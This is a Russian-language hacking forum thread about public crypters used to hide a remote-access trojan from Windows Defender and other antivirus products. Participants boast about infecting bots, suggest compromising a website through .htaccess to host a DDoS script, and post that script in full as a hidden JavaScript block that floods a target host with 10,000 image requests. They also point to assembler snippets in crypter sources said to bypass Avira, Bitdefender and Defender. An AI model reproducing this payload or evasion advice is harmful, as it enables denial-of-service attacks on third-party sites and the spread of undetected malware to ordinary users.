Актуальные крипторы

[Антоха]

Почему они бесполезные? :)

Покажи мне хоть один паблик-криптор который скрывает мой файл при запуске.Я тут хотел видос запилить с описанием,берём штучек 6-7 последних крипторов,сервер Бозка (к примеру) и Защитника Виндовс (чтобы далеко не ходить).Криптуем.Запускаем.Смотрим.Бозок спалится везде (при условии что криптор вообще рабочий).У меня просто энтузиазм сейчас пропал,потом сделаю.

 

[ewwa]

Покажи мне хоть один паблик-криптор который скрывает мой файл при запуске.Я тут хотел видос запилить с описанием,берём штучек 6-7 последних крипторов,сервер Бозка (к примеру) и Защитника Виндовс (чтобы далеко не ходить).Криптуем.Запускаем.Смотрим.Бозок спалится везде (при условии что криптор вообще рабочий).У меня просто энтузиазм сейчас пропал,потом сделаю.

Я не знаю что за крипторы ты юзаешь что их защитник палит, я с паблик криптором и сервисом вопрос-ответ по 5-10 ботов в день маял у которых были ав они сами качали и благополучно запускали..., еще и процентов 30 пользователей вообще не имеют ав., я конечно статистический анализ но проводил, но это действительно так по моему мнению.
С уважением :)

 

[X-Shar]

В паблике в основном палятся при запуске, это так-себе решение, нужно делать так что-бы не палились при запуске !

 

[Антоха]

В паблике в основном палятся при запуске

Вот и я про это.Не надо даже навороченных антивирей.Как я говорил выше ewwa,берёшь бозка и Защитника Виндовс.Некриптованного бозка-защитник знает хорошо.После крипта он естественно перестаёт его видеть,но стоит лишь запустить и всё.
Ewwa,назови хотя бы название своего криптора.Хотца глянуть на что-то более-менее стоящее.

 

[Антоха]

Блин,количество просмотров этой темы почти 1000,а ссылки все передохли (как впрочем и актуальность крипторов).Чтоб тема совсем не засохла надо чего-то добавлять....
Программка от Graxcon(а) для теста крипторов.Альтернатива стандартному "Hello world".Далее идёт копипаст.
Данная программа - подопытная жертва для теста крипторовhttps://ru-sfera.pw/data/MetaMirrorCache/fuckav.ru_images_smilies_ab.gif
С помощью неё можно определить - ломает ли криптор файл?

Основные преимущества перед обычным "Hello world" состоит в:
1. Состоит из двух частей
1) Shellcode (написан на MASM32 - вызывает обычное сообщение)
2) Сам CCT - состоит из двух частей
1. Обычный вызов MessageBox
2. MessageBox с криптованнным текстом и заголовком

Если все 3 сообщения успешно выведены - знайте:

1. В первом случае ваш криптор не сломает джойнер (CCT переносит массив шеллкода в себе)
2. Не "забудет", где вызываются API функции (user32.dll, Kernel32.dll и т.д.)
3. Не сломает алгоритмы файла, в том числе и математические (для декрипта сообщения используется обычный xor массива)

Автор: Graxcon
Пасс на архив:111

 

[KiberBerkut]

Лучше всего не крипторами работать а скриптом, к примеру взломал сайт на дле с посещаемостью более 1000 хостов в сутки через .htaccess т разместил там скрипт ddos запросов на сторонний сайт и все будет)) Наша жертва сразу ляжет.

 

[Антоха]

Круто!Сам Кибер Беркут в гости пожаловал!

разместил там скрипт ddos запросов на сторонний сайт и все будет

Ты про это говоришь?

Скопировать в буфер обмена

	<div id="attack" style="visibility:hidden">
	<script type="text/javascript">
	attack_host="www.{атакуемый сайт}.com"
	attack_port=80
	path='index.html'
	for(i=1;i<=10000;i++)
	{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
	</script></div>

Наша жертва сразу ляжет.

Да вроде пока таких врагов нет,чтоб их ддосить.А крипторы выложены (правда все ссылки умерли,а новые лить-лень) для привлечения "клутых вилусописателей".Может кто зайдёт,расскажет на форуме что-нибудь интересное.

 

[Антоха]

Олег,что-то я дохера битых ссылок развожу на ресурсе.Со всякими экспериментами-примерами на хостингере и макхосте и здесь.Как-то нужно исправляться.Сам не люблю когда на сайтах такая ерунда.

 

[X-Shar]

Что-то тема заглохла...

А есть у кого-нить необычные крипторы, которые не паковали-бы вирусы, а меняли структуру экзешника ?

По идее тогда такой вирус вообще не будет палится некем, кроме проактивки, да и-то не факт что и проактивка сработает !

 

[X-Shar]

После крипта он естественно перестаёт его видеть,но стоит лишь запустить и всё.

Есть специальные сигнатуры которые позволяют обходить защитника, бита, авиру и т.д.

Их можно увидеть в исходниках некоторых крипторов, эти сигнатуры написаны на ассемблере, но можно делать вставки, например в делфи, есть специальная директива asm, короче можно тупо копипастить....

Вот здесь в исходнике можно посмотреть эти сигнатуры, которые обходят детект там по мойму Авиры, бита и защитника...